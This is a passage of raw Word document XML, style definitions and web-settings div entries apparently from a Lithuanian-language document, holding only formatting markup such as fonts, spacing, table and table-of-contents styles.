    <w:aliases w:val="Įprastasis (tinklapis) Char"/>
    <w:link w:val="NormalWeb"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="000262D2"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SubtitleChar">
    <w:name w:val="Subtitle Char"/>
    <w:aliases w:val="Antrinis pavadinimas Char"/>
    <w:link w:val="Subtitle"/>
    <w:rsid w:val="000262D2"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="Times New Roman" w:hAnsi="Cambria"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="x-none" w:eastAsia="x-none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="000262D2"/>
    <w:pPr>
      <w:spacing w:before="240"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="000262D2"/>
    <w:pPr>
      <w:ind w:left="240"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="000262D2"/>
    <w:pPr>
      <w:ind w:left="480"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CodeStyle">
    <w:name w:val="Code Style"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CodeStyleChar"/>
    <w:qFormat/>
    <w:rsid w:val="000262D2"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
        <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
        <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
      <w:tabs>
        <w:tab w:val="left" w:pos="420"/>
        <w:tab w:val="left" w:pos="840"/>
      </w:tabs>
      <w:spacing w:before="120" w:after="120"/>
      <w:ind w:leftChars="100" w:left="100"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:lang w:val="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CodeStyleChar">
    <w:name w:val="Code Style Char"/>
    <w:link w:val="CodeStyle"/>
    <w:qFormat/>
    <w:rsid w:val="000262D2"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:szCs w:val="24"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Poteme">
    <w:name w:val="Poteme"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="000262D2"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="420"/>
      </w:tabs>
      <w:spacing w:after="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:lang w:val="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="WebLinks">
    <w:name w:val="Web Links"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="WebLinksChar"/>
    <w:qFormat/>
    <w:rsid w:val="000262D2"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="420"/>
      </w:tabs>
      <w:spacing w:after="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:lang w:val="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WebLinksChar">
    <w:name w:val="Web Links Char"/>
    <w:link w:val="WebLinks"/>
    <w:qFormat/>
    <w:rsid w:val="000262D2"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:i/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Style25">
    <w:name w:val="_Style 25"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:qFormat/>
    <w:rsid w:val="000262D2"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:tabs>
        <w:tab w:val="left" w:pos="420"/>
      </w:tabs>
      <w:spacing w:before="240" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="432" w:hanging="432"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:caps/>
      <w:color w:val="2E74B5"/>
      <w:kern w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Diagrama0">
    <w:name w:val="Diagrama"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="000262D2"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="420"/>
      </w:tabs>
      <w:spacing w:after="160" w:line="240" w:lineRule="exact"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Revision">
    <w:name w:val="Revision"/>
    <w:hidden/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="000262D2"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="11">
    <w:name w:val="11"/>
    <w:basedOn w:val="TableNormal"/>
    <w:rsid w:val="000262D2"/>
    <w:rPr>
      <w:rFonts w:cs="Calibri"/>
    </w:rPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:left w:w="115" w:type="dxa"/>
        <w:right w:w="115" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC5">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000262D2"/>
    <w:pPr>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC6">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000262D2"/>
    <w:pPr>
      <w:ind w:left="960"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC7">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000262D2"/>
    <w:pPr>
      <w:ind w:left="1200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000262D2"/>
    <w:pPr>
      <w:ind w:left="1440"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000262D2"/>
    <w:pPr>
      <w:ind w:left="1680"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Betarp1">
    <w:name w:val="Be tarpų1"/>
    <w:qFormat/>
    <w:rsid w:val="000262D2"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1296"/>
      </w:tabs>
      <w:suppressAutoHyphens/>
      <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:lang w:val="ru-RU" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="2">
    <w:name w:val="2"/>
    <w:basedOn w:val="TableNormal"/>
    <w:rsid w:val="000262D2"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:left w:w="115" w:type="dxa"/>
        <w:right w:w="115" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000262D2"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="SubtleEmphasis">
    <w:name w:val="Subtle Emphasis"/>
    <w:uiPriority w:val="19"/>
    <w:qFormat/>
    <w:rsid w:val="000262D2"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="wpproquizquestionlistitem">
    <w:name w:val="wpproquiz_questionlistitem"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="000262D2"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="z-TopofForm">
    <w:name w:val="HTML Top of Form"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="z-TopofFormChar"/>
    <w:hidden/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000262D2"/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="left" w:pos="420"/>
      </w:tabs>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:vanish/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:val="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="z-TopofFormChar">
    <w:name w:val="z-Top of Form Char"/>
    <w:link w:val="z-TopofForm"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="000262D2"/>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semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000262D2"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="6" w:space="1" w:color="auto"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="left" w:pos="420"/>
      </w:tabs>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:vanish/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:val="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="z-BottomofFormChar">
    <w:name w:val="z-Bottom of Form Char"/>
    <w:link w:val="z-BottomofForm"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="000262D2"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
      <w:vanish/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="4">
    <w:name w:val="4"/>
    <w:basedOn w:val="TableNormal"/>
    <w:rsid w:val="000262D2"/>
    <w:rPr>
      <w:rFonts w:cs="Calibri"/>
    </w:rPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:left w:w="115" w:type="dxa"/>
        <w:right w:w="115" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="answeroption">
    <w:name w:val="answeroption"/>
    <w:rsid w:val="000262D2"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="quesmarg">
    <w:name w:val="ques_marg"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="000262D2"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="UnresolvedMention10">
    <w:name w:val="Unresolved Mention1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000262D2"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText0">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000262D2"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="420"/>
      </w:tabs>
      <w:spacing w:after="120"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:val="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextChar">
    <w:name w:val="Body Text Char"/>
    <w:link w:val="BodyText0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="000262D2"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="skimlinks-unlinked">
    <w:name w:val="skimlinks-unlinked"/>
    <w:rsid w:val="000262D2"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="UnresolvedMention2">
    <w:name w:val="Unresolved Mention2"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000262D2"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList1">
    <w:name w:val="No List1"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F55F68"/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="TableGrid1">
    <w:name w:val="Table Grid1"/>
    <w:basedOn w:val="TableNormal"/>
    <w:next w:val="TableGrid"/>
    <w:uiPriority w:val="39"/>
    <w:qFormat/>
    <w:rsid w:val="00F55F68"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="SimSun"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E350EA"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="lt-LT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList2">
    <w:name w:val="No List2"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00616C06"/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="TableGrid2">
    <w:name w:val="Table Grid2"/>
    <w:basedOn w:val="TableNormal"/>
    <w:next w:val="TableGrid"/>
    <w:uiPriority w:val="39"/>
    <w:qFormat/>
    <w:rsid w:val="00616C06"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="SimSun"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145165">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="256059251">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="293216281">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="293411332">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="545022692">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="594243696">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="610016948">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="719014732">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="106849165">
          <w:marLeft w:val="547"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="154"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1143932855">
          <w:marLeft w:val="547"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="154"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1508206710">
          <w:marLeft w:val="547"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="154"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1617983298">
          <w:marLeft w:val="547"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="154"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1888295025">
          <w:marLeft w:val="547"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="154"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="772287889">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="93132366">
          <w:marLeft w:val="965"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="86"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="301733866">
          <w:marLeft w:val="965"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="86"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="694892547">
          <w:marLeft w:val="965"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="86"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="863253377">
          <w:marLeft w:val="965"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="86"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
